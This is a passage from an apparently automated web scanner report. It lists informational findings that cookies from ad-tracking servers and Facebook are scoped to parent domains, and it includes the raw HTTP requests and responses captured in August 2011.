udm_0=MLv39VEJbipn5t7J7tE47oWpHVhV4iFqyoWhb2YXc6RRizmzpbqRcFBJpZa8l0/uGxQLxorDLBD8TuVA5WUNID4jhibwZ4E3KEU7bmjAF+DMTX99Z8e5TAcE/5iospv1jq9WzdzH5G3PkTAHlmVVPjMTmkYoiypja8RHeBfW2LL9lawOWNi8GwZWyw2dptMkZkc87MWtUzoO+rbDn+knVc2nLJWzG1vDLEyevLiplpqbjrKec46MMWKWbmMzN6p9Rw0yaI/TkoS+QszoihnKYnTOv4liHmcyUNB3uDcCjJB89p4BkAaVcvlMvwsKDN2hy/x6WccZasvQrozCULup8a8RXgtxrWqM/VBtvHre1tNbfO3uTCLNnN+OpRrzm57EzcIQtJXTltma6dUA+8ydgf8unZm1D8/nsjrnkKFE/a/QeFcsbB/QzplghtgVlbWO9Veu6ri/Bl1yDicT1Kx85i9E8fFUNK1ps6ulCkx9MzRALJPTCYsaXNd+smUyAgPXJoxUtWuoMfjw/WyJB87mUUKGn5DfwJSI/GPXnJ9pX8UJdPSlij4d47Z1GkF4/TLjx0B09V9bIFsdq1cISdi1EeAUfKzuTAARPEHqqFm0tAwzQYOwol+JFGsyGw8mWij3NSBIoWsTuyOw90Q/RODiirBkJZC5+xVSm/1OF4AEL77IF2UQam7poywBCRgs1KI/BO4b86ksCDD+9xxr4vHsm36fCJ0Zm7hnJHavzcI3BlVT5mFi8Pyrs/sAV7+YncekvRHOkcYlTf/bxdaqbNUSRNIvL+wESWlSU6Aivg+oq+GzA7lWv2MOfB60fwu3JaGiGVlNEW/hUozI25/78jDSNd6GhJcXulA9rfV2Bm2jvmVm2v8JIfW1jtNqJ70byKHRd5Dp+EHW1b7BMtwMK8g38PlNfoKZ6rOwz4jKQuNu7dBIs4xwZq/rTrJZq1QFru72+1vyngso51QCD7ofa22bBk6bIzGnZHqw7LKckKR0Px2GDzHiqKZKGOrsMXwRIoT1IuLLN8mska8o+hzro3rcfjPZQPShQdRUyys5bIh66cb9OtaO6QfQLMHigl9kIwrCGA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_w54y=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wwje=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_GS70=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KRSP=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_sPwj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJkOBbwIMV594t6370FESecNWU/1rwrKnF0RvvMpZKic5ngyRcQgYrs0bIzTjXSAIcE4zTaFgPgtwc8lVQPi/gyxKsYP+vNRmenbJ6esMOTfuQPPWuRacBYCoCRTRO57PdHBMVyIWESlQnpxz0YF0eyDxIX93DUG/JW4VG2H/Fq9uz5dAOPMtPl+iqnAOUmltwt9hgm8W4eB0jIA/gkmJyi9baCyBm6zX3y0gha7M+pXBFYNHNJETkkeNoZnWqwtK9k/mSji+wt97fjci1sUfRNO7I+EXKSY4EuEXliBFR5Bi1eTlWXMKjqRtmw==; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:49:25 GMT; Path=/
Set-Cookie: rtc_3b9U=MLs3sVMu8D5nJxHcWw+0zMKkj2Ec8AtgOr6luGR0s/YGr/xIEyuuo6PyP6rJ0huw9fXd6eF11jsqafZ5D+xsAtuozm3Y+FP7gO7bzYbJ3BQaYAbxIXeqtI6gDqEbJDEUZ+OaHlsnUySUjfOYD5RN2whRNsKtuTXJSoXImp9Bjn0ejWdnK8a6//EQI/8+dPnXpiVbJ/jGiMc8aaXYHrTot0RryuQ3ppNos7U2ucvQ2S09+GQFPnIzJ/nDdOnUEBp6IR5hscrpvn6gbQJdnHaOZVmXUNHaMqju0cicQuy33ukQ+idHdRM2s+iGUUSCL7fb4c98Ybo5nH4y1IcRphkaUYgwOxVaAYZMBcKLEfAUJEEIIwJynHkS3xqpLNBouYZqgiAjOeG8tfsDuS5VbvJMlvSyZgnoPaG3RVr3E0bSMZbjG79N2WoTaddr; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:49:25 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:49:24 GMT
Content-Length: 1790

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['H07710_10055','H07710_10041','H07710_10194','H07710_10052','H07710_10138','H07710_10515','H07710_10541','H07710_10313','H07710_10343',
...[SNIP]...

12.33. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tap.php?v=2358 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/display.html?cl=ca-aj-cat&ch=&ty=image%2Cflash&size=300x250&kw=&hints=&target=/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1313432642380?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=epx833ob7ioshhooj9oxwp9jj6h1a7p1; put_1430=7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; put_1185=3041410246858069995; cd=false; au=GR8BFBR6-BJ4A-10.195.158.129; lm="11 Aug 2011 22:44:28 GMT"; put_1994=1sbvs30c072oq; put_2054=be7b476b-57fa-4267-a79e-a26d510d1377; rpb=7249%3D1%264554%3D1%264212%3D1%262373%3D1%264940%3D1%265327%3D1%265421%3D1%267203%3D1; rpx=7249%3D13566%2C0%2C1%2C%2C%264554%3D13884%2C0%2C1%2C%2C%264940%3D14009%2C120%2C2%2C%2C%264212%3D14028%2C0%2C1%2C%2C%262373%3D14129%2C0%2C1%2C%2C%265327%3D14148%2C0%2C1%2C%2C%265421%3D14172%2C0%2C1%2C%2C%267203%3D14173%2C0%2C1%2C%2C

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:24:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7249%3D1%264554%3D1%264212%3D1%262373%3D1%264940%3D1%265327%3D1%265421%3D1%267203%3D1%262358%3D1; expires=Wed, 14-Sep-2011 18:24:14 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7249%3D13566%2C0%2C1%2C%2C%264554%3D13884%2C0%2C1%2C%2C%264940%3D14009%2C120%2C2%2C%2C%264212%3D14028%2C0%2C1%2C%2C%262373%3D14129%2C0%2C1%2C%2C%265327%3D14148%2C0%2C1%2C%2C%265421%3D14172%2C0%2C1%2C%2C%267203%3D14173%2C0%2C1%2C%2C%262358%3D14194%2C0%2C2%2C%2C; expires=Wed, 14-Sep-2011 18:24:14 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

12.34. http://pt-br.facebook.com/ajax/captcha/recaptcha_log_actions.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pt-br.facebook.com
Path:   /ajax/captcha/recaptcha_log_actions.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/captcha/recaptcha_log_actions.php?__a=1&action=shown&ua=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F535.1%20(KHTML%2C%20like%20Gecko)%20Chrome%2F13.0.782.112%20Safari%2F535.1&location=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662 HTTP/1.1
Host: pt-br.facebook.com
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
X-SVN-Rev: 422152
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755; act=1313433616787%2F1; wd=1123x954

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 34
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-Frame-Options: DENY
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.64.105.59
X-Cnection: close
Date: Mon, 15 Aug 2011 18:39:47 GMT

for (;;);{"__ar":1,"payload":null}

12.35. http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pt-br.facebook.com
Path:   /people/Andr%C3%A9-Azevedo/1668500662

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /people/Andr%C3%A9-Azevedo/1668500662 HTTP/1.1
Host: pt-br.facebook.com
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
Content-Length: 998
Cache-Control: max-age=0
Origin: http://pt-br.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755; act=1313433616787%2F1

post_form_id=208956c150919ab1cdeb13e59d929c7b&lsd=yxUAz&captcha_persist_data=AZn2Prk2YE02IBt6SralDuwZdXf9ZmW3h45Cn_PY4olwLPKhUXsCTDVn8L9HD-Vh3HuEMIvMMVmehaCRNynGK33nkkHNi9pP41mupKoNjo04_5AY6G12AqHHbwP
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: x-src=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.166.91
X-Cnection: close
Date: Mon, 15 Aug 2011 18:39:57 GMT
Content-Length: 72641

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt" xmlns:og="http://ogp.me/ns#" lang="pt" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;wi
...[SNIP]...

12.36. http://r1-ads.ace.advertising.com/site=789981/size=728090/u=2/bnum=73612408/hr=13/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.imdb.com%252Fimages%252FSF99c7f777fc74f1d954417f99b985a4af%252Fa%252Fifb%252Fdoubleclick%252Fexpand.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=789981/size=728090/u=2/bnum=73612408/hr=13/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.imdb.com%252Fimages%252FSF99c7f777fc74f1d954417f99b985a4af%252Fa%252Fifb%252Fdoubleclick%252Fexpand.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=789981/size=728090/u=2/bnum=73612408/hr=13/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.imdb.com%252Fimages%252FSF99c7f777fc74f1d954417f99b985a4af%252Fa%252Fifb%252Fdoubleclick%252Fexpand.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=pH430013111733250028; aceRTB=rm%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7Cam%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7Cdc%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7Can%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7Crub%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7C; A07L=3DM2reol9thECsRTmmuji_6yZBuTfBAd8OCZMhF9rk8jCf_-UPHfh8A; GUID=MTMxMzE5ODMwNTsxOjE3NGJrNzAwYWI2NjZtOjM2NQ; C2=BeTSOlLuFYRxG4Jq5EwFbZwaq+WAsVmRSjKOAMxWGRGtbLQtuaMGKMtrGDNZjMrxQLoIH0bSFl2moVmfzZUozS+B8pqRpVmfqaUoSK8BItdh4eQ3WXIuwaHCW8oxIBK9IU1IGCF; F1=BE4NJ5kAAAAA9iCDAEAAgEABAAAABAAAAEAAgEA; BASE=6cQnzlHYhoShvR1ceK3XL5aycYSYS86phwGH+KypTDXy5bPKnWShBX+I1kY4koT2wF0GVGuvu9AwwtMNvfiwMKCK3FXHo6CDdE4k8Ac0L0vPHOjgv1X3VKLkc5jIoT3KrQ0dlev7c4Q7TtKXkwoTyzZpoD5kIIWMw6pKXumJxaAylsrGPflwlzGZJOqJpfNI/gxASKU+TQ1nZ+L78EymLnA!; ROLL=jTgYEkXLjqa4aJBDIcb3d6zVdS4qvatzUjH3Pi0QjhhuPM9d8fW31EAB/MYISDOnqNIptoFV6jtmADHvDwkEA/5Fw5NB03P!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.973593.789981.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 15 Aug 2011 18:41:26 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:41:27 GMT
Content-Length: 1047
Connection: close
Set-Cookie: C2=XhWSOlLuFYRxGPJq5EwFbZwaq+WAsVmBIjKOAMxWGoFtbLQtuaoDKMtrGaMZjMrhGLoIH0bSF81moVmfzZwlzS+B8pqBfVmfqawlSK8BItdRueQ3WXkrwaHCW8oh+AK9IU1IGZE; domain=advertising.com; expires=Wed, 14-Aug-2013 18:41:26 GMT; path=/
Set-Cookie: F1=BcFaJ5kAAAAAd3ADAEAAgEgAAAAA9iCDAEAAODABAAAABAAAAIAAODA; domain=advertising.com; expires=Wed, 14-Aug-2013 18:41:26 GMT; path=/
Set-Cookie: BASE=6cQnylHYhoShvR1ceK3XL5aycYSYS86phwGH+KypTDXy5bPKnWShBX+I1kY4koT2wF0GVGuvu9AwwtMNvfiwMKCK3FXHo6CDdE4k8Ac0L0vPHOjgv1X3VKLkc5jIoT3KrQ0dlev7c4Q7TtKXkwoTyzZpoD5kIIWMw6pKXumJxaAylsrGPflwlzGZJOqJpfNI/gxASKU+TQ1nZ+L78EymLnAW4DkJw8N!; domain=advertising.com; expires=Wed, 14-Aug-2013 18:41:26 GMT; path=/
Set-Cookie: ROLL=jTgYEkXLjqa4aJBDIcb3d6zVdS4qvatvUjH3ic0QjhhuPM9d8fW31EAB/MYISDOnqNIptoFV6jtmADHvDwkEA/5Fw5NB03P!; domain=advertising.com; expires=Wed, 14-Aug-2013 18:41:26 GMT; path=/
Set-Cookie: 73612408=_4e496857,3023863148,789981^973593^65^0,0_; domain=advertising.com; path=/click

document.write('<iframe src="http://view.atdmt.com/CNT/iview/286710723/direct;wi.728;hi.90/01/3023863148?click=http://r1-ads.ace.advertising.com/click/site=0000789981/mnum=0000973593/cstr=73612408=_4e
...[SNIP]...

12.37. http://sales.liveperson.net/hc/76226072/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/76226072/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/76226072/?visitor=&msessionkey=&site=76226072&cmd=inPage&page=http%3A//www.wireless.att.com/cell-phone-service/packages/free-packages.jsp%3Fsource%3DECWD000000000000O&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=1313431960956&javaSupport=true&id=8278613948&scriptVersion=1.1&d=1313432381829&cobrowse=true&cookie=TLTUID%3D7284D2A8C16210C1695BC3E02554C7F2%3B%20ECOM_GTM%3DNA_osbth%3B%20cust_type%3Dnew%3B%20browserid%3DA001693504923%3B%20svariants%3DNA%3B%20DL3K%3D3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg%3B%2000d78e1f-01f0-45cd-9f9c-79e690335b05%3D%257B%2522parent_id%2522%253A%2522kwkf9w9SRba%2522%252C%2522referrer%2522%253A%2522http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%2522%252C%2522id%2522%253A%2522uo_OgfisI0f%2522%252C%2522wom%2522%253Atrue%252C%2522entry_point%2522%253A%2522http%253A%252F%252Fwww.wireless.att.com%252Fcell-phone-service%252Fcell-phones%252Fcell-phones.jsp%253Ffeacondition%253Dallphones%2526feaavailable%253Dallphones%2526feapaytype%253Dstandard%2526startFilter%253Dfalse%2526allTypes%253Don%2526osWindows%252520Phone%253D100012%2526allManus%253Don%2526source%253DECWD000000000000O%2523fbid%25253Dkwkf9w9SRba%2526migAtlSA%253D341465538%2526migAtlC%253D480d7815-42e6-4315-a737-64cdf14f8adc%2522%252C%2522url_tag%2522%253A%2522NOMTAG%2522%257D%3B%20bn_u%3D6923670900791695274%3B%20__utma%3D52846072.1104250127.1312768993.1312768993.1312768993.1%3B%20__utmz%3D52846072.1312768993.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/referrerPathName%3B%20__utma%3D241758596.1378329856.1312769231.1312769231.1313431966.2%3B%20__utmz%3D241758596.1313431966.2.2.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/referrerPathName%3B%20TLTHID%3D0ADE256AC76A10C7A712DC7C2E9C4CD7%3B%20TLTSID%3D04A9E9E0C76A10C798F7CEF5BD5C2DB8%3B%20DYN_USER_ID%3D4148411862&title=Free%2&referrer= HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O
Cookie: LivePersonID=-546022977410-1313431914:-1:-1:-1:-1; HumanClickKEY=7991325949139639887; HumanClickSiteContainerID_76226072=Master; LivePersonID=LP i=546022977410,d=1312768968; HumanClickACTIVE=1313431908597

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:22:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_76226072=Master; path=/hc/76226072
Set-Cookie: LivePersonID=-546022977410-1313431914:-1:-1:-1:-1; expires=Tue, 14-Aug-2012 18:22:48 GMT; path=/hc/76226072; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 34

GIF89a(............,...........L.;

12.38. http://segment-pixel.invitemedia.com/set_partner_uid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /set_partner_uid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set_partner_uid?partnerID=191&sscs_active=1&partnerUID=2865308626608336017 HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://pixel.invitemedia.com/data_sync?partner_id=64&exchange_id=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=aec68995-e6c4-4c62-92ef-0b6b1fb1c15f; uid=1e4cb365-db7a-4e61-9b94-c144934e6ac1; exchange_uid="eyIyIjogWyIzNTM5NjU2OTQ2OTMxNTYwNjk2IiwgNzM0MzUyXSwgIjQiOiBbIkNBRVNFSkYxUkRIYVhLUk43UTQ3eUpPVXdMayIsIDczNDM0MF0sICI3IjogWyIxMjVBQkE5RC0wRkUyLTQzQkItQURFNS0wRTFBMjkwRjBDQUYiLCA3MzQzNjRdfQ=="; partnerUID=eyIxMTUiOiBbIjRlMzcxMDA1OGNmNzZjOTAiLCB0cnVlXSwgIjE1IjogWyIwMDMwMDEwMDIxOTAwMDAwNzk3NDAiLCB0cnVlXSwgIjg0IjogWyJIaTFIMWh6OTk5OTNlSDJtIiwgdHJ1ZV19; segments_p1="eJzjYubYyMPFxbH/ALPAi2nHPrEA2Sd7mARerN0GZLNwdHYwczFzHGfk4uSYHiBw79iEzywAncMQww=="; __utma=140145771.1424462457.1313432170.1313432170.1313432170.1; __utmb=140145771.4.10.1313432170; __utmz=140145771.1313432170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dp_rec="{\"1\": 1313426619+ \"2\": 1313426607+ \"5\": 1313432697+ \"4\": 1313426573}"; subID="{}"; impressions="{\"769846\": [1312767370+ \"dffe82cd-ff8c-4145-a734-bdd8d42b5cc7\"+ 69905+ 29809+ 1365]+ \"748419\": [1312767414+ \"c293e3f7-1374-398b-ad44-93d92a9ce4be\"+ 219708+ 61959+ 12050]+ \"728928\": [1313426607+ \"c4c0133b-0eac-475e-83d5-75db053b7608\"+ 70238+ 29835+ 1209]+ \"718819\": [1313102115+ \"08dcd5d0-76e4-4739-88e9-ffac3e204fc4\"+ 69900+ 29809+ 1365]+ \"799461\": [1313426618+ \"98F18B32-A1BA-4442-B3D4-AC0B1190E029\"+ 69861+ 29806+ 1209]+ \"728904\": [1313432697+ \"9438D1EC-137A-41B9-A85A-FC3DB1591307\"+ 70251+ 29836+ 1209]}"; camp_freq_p1="eJzjkuG4dJdZgEni54mln1gUGDW2ngTSBkwWvTOBNJcMx+sJbAKMErtmQmR33V8PlGW0APO5JDjOrGMByq4HyzJoMABlwGwuEY5Vx0H6Fm+aCJVhsGAAina9Aolu+/3nI7JodzM70AVdyKIA+Sgw2A=="; io_freq_p1="eJzjEufY4yLALPHzxNJPLAoMGgwGzBa9M4FsLnGOSfECjBK7ZsIkGC3AbC5hjqnJQB2LN02ESjBYMAAFJ6cBVW/7/ecjXBAABE8aYg=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 15 Aug 2011 18:26:33 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 15-Aug-2011 18:26:13 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: partnerUID="eyIxMTUiOiBbIjRlMzcxMDA1OGNmNzZjOTAiLCB0cnVlXSwgIjE5MSI6IFsiMjg2NTMwODYyNjYwODMzNjAxNyIsIHRydWVdLCAiMTUiOiBbIjAwMzAwMTAwMjE5MDAwMDA3OTc0MCIsIHRydWVdLCAiODQiOiBbIkhpMUgxaHo5OTk5M2VIMm0iLCB0cnVlXX0="; Domain=invitemedia.com; expires=Tue, 14-Aug-2012 18:26:33 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

12.39. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

